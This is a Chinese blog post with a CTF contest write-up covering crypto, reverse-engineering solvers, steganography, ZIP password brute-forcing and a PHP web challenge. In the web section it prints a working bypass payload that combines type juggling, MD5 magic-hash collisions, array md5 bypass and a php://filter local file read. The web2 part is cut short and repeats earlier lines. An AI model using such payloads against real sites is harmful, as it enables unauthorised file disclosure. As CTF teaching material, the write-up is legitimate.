周赛wp1

已于 2023-04-19 20:26:22 修改
阅读量86 收藏
点赞数
文章标签: java c++ servlet
于 2023-04-03 19:38:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lovechinasomuch/article/details/129937534
版权
文章讲述了多个网络安全挑战,包括基于凯撒密码的加密解密问题,C语言实现的字符串反转和字符替换,程序调试与EIP修改,以及通过二维码和Linux图形工具解析隐藏信息。此外,还涉及了ZIP文件的密码破解和PHP代码中利用弱比较与MD5绕过的技巧。
摘要由CSDN通过智能技术生成

CRYPTO

1.Keyed Caesar

key里字母在字母表中的数字就是偏移量

注意凯撒通常只针对二十六个字母

2.找找看

image-20230226184700958

REVERSE

1.re1

image-20230225115535710

3替换成e 4替换成a结束

flag = "{34sy_r3v3rs3}"
flag=flag.replace("3","e").replace("4","a")
print("SLsec" + flag)

2.re2

image-20230225134651061

第一种方法

#include <stdio.h>
#include <string.h>
int main()
{
    char str1[64] = "QJqcaypc]fcjjm{";
    //char flag[64] = "SLsec{re_hello}";
    int len = strlen(str1);
    for(int i=0;i<len;i++)
    {
        if ( str1[i] > 94 && str1[i] <= 96 || str1[i] > 62 && str1[i] <= 64 )
        {
            str1[i] -= 24;  
        }
        else 
        {
            str1[i] += 2;
        }
        
        printf("%c",str1[i]);
    }
    return 0;
     
}

第二种方法是爆破

#include <stdio.h>
#include <string.h>
int main()
{
    char Str1[16] = "QJqcaypc]fcjjm{";
    char flag[16] = "";
    int i,j = 0;
    for(i=0;i<16;i++)
    {
        for(j=65;j<126;j++)
        {
            flag[i] = j;
            if ( flag[i] > 96 && flag[i] <= 98 || flag[i] > 64 && flag[i] <= 66 )
            {
                flag[i] += 24;
            }
            else
            {
                flag[i] -= 2;
            }
            if(flag[i] == Str1[i])
            {
                printf("%c",j);
            }
        }
    
    }
​
    return 0;
     
}

3.re3

image-20230226013043966

主函数啥都没有,在函数列表发现了名为ques的可疑函数,经过调试程序并没有执行这个函数,思路是修改EIP即可

image-20230226013109781

ques函数地址00401520

image-20230226013328290

修改之后按F9执行就可

image-20230226013418305

HACKIT4FUN

MISC

1.神奇的二维码

with open('hex.txt', 'r') as h:
    h = h.read()
with open('./ascii.txt', 'a') as a:
    for i in range(0, len(h), 2):
        tmp = '0x'+h[i]+h[i+1]
        tmp = int(tmp, base=16)
        if chr(tmp) != '(' and chr(tmp) != ')':
            a.write(chr(tmp))
import matplotlib.pyplot as plt
import numpy as np
x, y = np.loadtxt('./ascii.txt', delimiter=',', unpack=True)
plt.plot(x, y,  '.')
plt.show()

010打开图片发现很多16进制数据,提取出来转化为字符串就是坐标,再利用坐标画个二维码就可

第二种方法更简单,在linux利用gnuplot插件就能画图

image-20230226184450729

2.re4

明文爆破压缩包

image-20230226191238175

随后用IDA打开看主函数

int __cdecl main(int argc, const char **argv, const char **envp)
{
  FILE *stream; // ST08_8
  signed int i; // [rsp+4h] [rbp-2Ch]
  char ptr[24]; // [rsp+10h] [rbp-20h]
  unsigned __int64 v7; // [rsp+28h] [rbp-8h]
​
  v7 = __readfsqword(40u);
  stream = fopen("flag", "r");
  fread(ptr, 1uLL, 20uLL, stream);
  fclose(stream);
  for ( i = 1; i <= 19; ++i )
  {
    if ( i & 1 )
      printf("%ld\n", (unsigned int)(ptr[i] << i));
    else
      printf("%ld\n", (unsigned int)(i * ptr[i]));
  }
  return 0;
}
​

没什么加密,顺着逆一下就出了

脚本

#include <stdio.h>
#include <string.h>
int main()
{
     int arr[20] = { 0, 198,232,816,200,1536,300,6144,984,51200,570,92160,1200,565248,756,1474560,800,6291456,1782,65536000};
    //a[0]补0保证正常循环
    char c;
    for ( int i = 1; i <= 19; i++)
    {
        if ((i & 1))
            c = (arr[i] >> i);
        else
            c = (arr[i] / i);
        putchar(c);
    }
    return 0;

3.小狗玩偶

flag总共两部分,16进制文本里能看到一部分,另一部分在LSB隐写

image-20230226185133964

image-20230226185302457

4.zip

有密码尝试一下确定不是伪加密,爆破4到7为纯数字成功,打开压缩包是一串编码,16进制解一下就是flag

image-20230226185650652

WEB

1.web1

<?PHP

show_source(FILE);

ini_set("allow_url_include","on");

error_reporting(0);

$file=$_GET['file'];

$q=$_GET['q'];

$a = $GET['a'];

$b = $_GET['b'];

$c = $_POST['c'];

$v = $_POST['v'];

if($q==1 && $q+1 !== 2){ #q==弱比较,不同格式会先转换成同类型再比较,q!+1!==2是强比较必须类型数值完全相同科学计数法绕过即可

if($a != $b && md5($a) == md5($b)){#md5绕过

让其加密后oe开头即可,问你知道为什么马?

if($POST['c']!==$POST['v']&&md5($POST['c'])===md5($POST['v'])){ 强比较若: 假===假 => 真c[]=1&v[]=2

if(isset($file)){使用php伪协议读取flag.php即可

image-20230226190410270

echo 'flag flag.php涓 ';

}else{

echo "file";

}

}

}

}

include_once($file);

?>

GET: /?q=0.1e1&a=QNKCDZO&b=s155964671a&file=php://filter/convert.base64-encode/resource=flag.php

POST : c[]=2&v[]=3

2.web2

首先随便上传一个文件看看提示

image-20230226185942853

规定了上传的文件名

image-20230226185952578

上传内容要有givemeflag,直接再bp加

?>

GET: /?q=0.1e1&a=QNKCDZO&b=s155964671a&file=php://filter/convert.base64-encode/resource=flag.php

POST : c[]=2&v[]=3

lovechinasomuch
关注
凯撒密码 C语言 加密解密
肥肉的小屋
03-18 5万+
凯撒密码凯撒加密(Caesarcipher)是一种简单的消息编码方式:它根据字母表将消息中的每个字母移动常量位k。 举个例子如果k等于3,则在编码后的消息中,每个字母都会向前移动3位: a会被替换为d;b会被替换成e;依此类推。字母表末尾将回卷到字母表开头。 于是,w会被替换为z,x会被替换为a。如果是将移动的位数用随机数进行代替,并且记录下该随机数,则破解密码的难度将大大增加。Source
leetcode周赛难度-leetcode:leetcode
07-06
周赛难度LeetCode 题解 一题目列表 细绳 # 标题 标签 困难 解决方案 描述 1 细绳 中等的 2 细绳 中等的 3 细绳 中等的 4 细绳 中等的 DP # 标题 标签 困难 解决方案 描述 1 DP 中等的 2 DP 中等的 3 DP 中等的 4 DP ...
初学古典密码
m0_74014107的博客
11-05 2434
目录 古典密码 Wiki篇 二,凯撒密码Caesar: 三,移位密码 四,Atbash Cipher(埃特巴什码): 五,简单替换密码 六,仿射密码(affine cipher) 多表代换加密 一,Playfair 二,Polybius 三,Vigenere维吉尼亚密码 四,Nihilist 五,Hill 六,AutokeyCipher 群里网站篇
[CTF]培根密码
Fllowone的博客
12-16 1801
[CTF]培根密码 ---------------------  作者:adversity`  来源:CSDN  原文:https://blog.csdn.net/qq_40836553/article/details/79383488  培根密码中的ab,代表的是数学二进制中的0和1.通过下列的密码表进行加密和解密: 第一种方式: A aaaaa B aaaab C aaaba D aaab...
密码学--CTF Crypto 总结
渗透测试研究中心
12-15 7554
密码学简介 密码学(Cryptography)一般可分为古典密码学和现代密码学。 其中,古典密码学,作为一种实用性艺术存在,其编码和破译通常依赖于设计者和敌手的创造力与技巧,并没有对密码学原件进行清晰的定义。其主要包含以下几个方面 单表替换加密 多表替换加密 奇奇怪怪的加密方式 而现代密码学则起源于 20 世纪末出现的大量相关理论,这些理论使得现代密码学成为了一种可以系统而严格地学习的科学。现代密码学又可以简单的分为以下几个方面 对称密码,以 DES,AES,RC4 为代表。 非对称密码,以
caesar加密_如何编写Caesar密码:基本加密简介
cumi7754的博客
08-01 1504
caesar加密by Brendan Massey 由布伦丹·梅西(Brendan Massey) The Caesar Cipher is a famous implementation of early day encryption. It would take a sentence and reorganize it based on a key that is enacted upon ...
周赛wp2
lovechinasomuch的博客
04-03 67
preg_match("/[a-z]|./i", $num)又禁用了十六进制前缀中的x所以只能使用八进制来绕过但if(!题目并没有给你现成的地图,需要自己简单的调试一下,在check函数里面定义了迷宫的规则,wsad控制上下左右。转换后的图片没有藏文件,在stegslove里的Green plane2通道发现了条形码。(intval($num,0)===4476)这个就是没别的办法只能寻找特殊字符绕过了。struct里的这部分原文件里是没有的,将它插入进去改文件后缀位pyc就可。下面一部分 num!
周赛wp3
lovechinasomuch的博客
04-03 300
这道题是shangu👴赞助的附件很简单,一个key,一个flag,还有题目的关键描述 ‘xor’这道题脑洞很大,所以我就按我的分析来了首先看key,标准的flag格式,但是前四位被替换成了'jaks',里面是按照键盘的qwer顺序,最开始分析的是字母在表中的顺序之类的,但是死活凑不出flag就放弃了。换一条思路,异或具有可逆性,或许’jask‘与’flag‘异或的结果就是我们要找的关键。
LeetCode 85双周赛(补记)
vcj1009784814的博客
09-02 749
仍然是3道题,第4题做了尝试,有基本思路(不像以前根本没时间和机会和第4题打照面),还算是有进步。什么时候能AK一次呢,还得继续加油。
【Web】NSSCTF Round#17 Basic个人wp(全)
uuzeray的博客
01-28 1541
题目作为小练手还行,具体细节不必较劲。
第三次周赛题解(1).md
06-11
第三次周赛题解(1).md
leetcode周赛得分3-mstcBlog:微博
07-07
1. **LeetCode挑战**:项目可能详细记录了作者如何解决LeetCode上的问题,包括但不限于算法选择、时间复杂度优化、数据结构应用等。 2. **算法与数据结构**:作者在解题过程中可能会用到各种常见的算法(如二分查找...
leetcode周赛积分-leetcode:leetcode刷题记录
07-07
leetcode周赛积分 leetcode 推荐 No. Problems Solutions Tag 32 DP, Stack 周赛 (weekly-content) No. Solutions Completion Date 2020.07.05 刷题记录 No. Problems Solutions Completion Date 329 2020.07.26 16 ...
JAVA-01-变量
LJH_laura_li的博客
11-08 329
在方法、构造函数或块内部定义的变量。
基于 SpringBoot 实现QQ邮箱验证码注册功能
2301_79201049的博客
11-06 637
找到并开通以下的邮件协议服务,而且服务开启也较为简单,需要我们发送一个短信到指定的号码,开启后平台会提供一个授权码,一定要记住这个授权码,发邮件的时候需要这个。host 是根据服务主机区分,网易邮箱是 smtp.163.com, qq邮箱是 smtp.qq.com。其中的 username 是你第一步中操作的邮箱账号,nickname 是接收者收到邮件中显示的发件人。发送邮件的核心依赖是 mail ,由于该项目还涉及其他依赖就全都导进来了。(1)首先打开QQ邮箱,点击设置并来到账号页面。
Java基于小程序公考学习平台的设计与实现(附源码,文档)
最新发布
chusheng1840的博客
11-09 827
Java基于小程序公考学习平台的设计与实现,小程序公考学习平台使用Java语言进行编码,使用Mysql创建数据表保存本系统产生的数据。系统可以提供信息显示和相应服务,其管理小程序公考学习平台信息,查看小程序公考学习平台信息,管理小程序公考学习平台。总之,小程序公考学习平台集中管理信息,有着保密性强,效率高,存储空间大,成本低等诸多优点。它可以降低信息管理成本,实现信息管理计算机化。关键词:小程序公考学习平台;Java语言;Mysql。
java_方法重写/覆盖(override)
HHppGo的博客
11-07 326
方法覆盖(重写)就是子类有一个方法,和父类的某个方法的名称、返回类型、参数一样,那么我们就说子类的这个方法覆盖了父类的方法。
在 C# 中,如何实现观察者模式?
Leo的博客
11-06 440
观察者模式是一种设计模式,它定义了一种一对多的依赖关系,让多个观察者对象同时监听某一个主题对象。当该主题对象的状态发生变化时,会通知所有观察者对象,使它们能够自动更新自己。这个模式常用于事件处理系统、通知系统等场景。
并发编程的基础:深入理解内存屏障(Memory Barriers)
2401_86353562的博客
11-06 993
内存屏障是一种基础语言,在不同的计算机架构下有不同的实现细节。本文主要在x86_64处理器下,通过Linux及其内核代码来分析和使用内存屏障对大多数应用层开发者来说,“内存屏障”(memory Barrier)是一种陌生,甚至有些诡异的技术。实际上,他机制常被用在操作系统内核中,用于实现同步、驱动程序利用它,能够实现高效的无锁数据结构,提高多线程程序的性能表现。本文首先探讨了内存屏障的必要性,之后介绍如何利用内存屏障实现一个无锁唤醒振荡器(队列),用于在多个线程间进行高效的数据交换。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值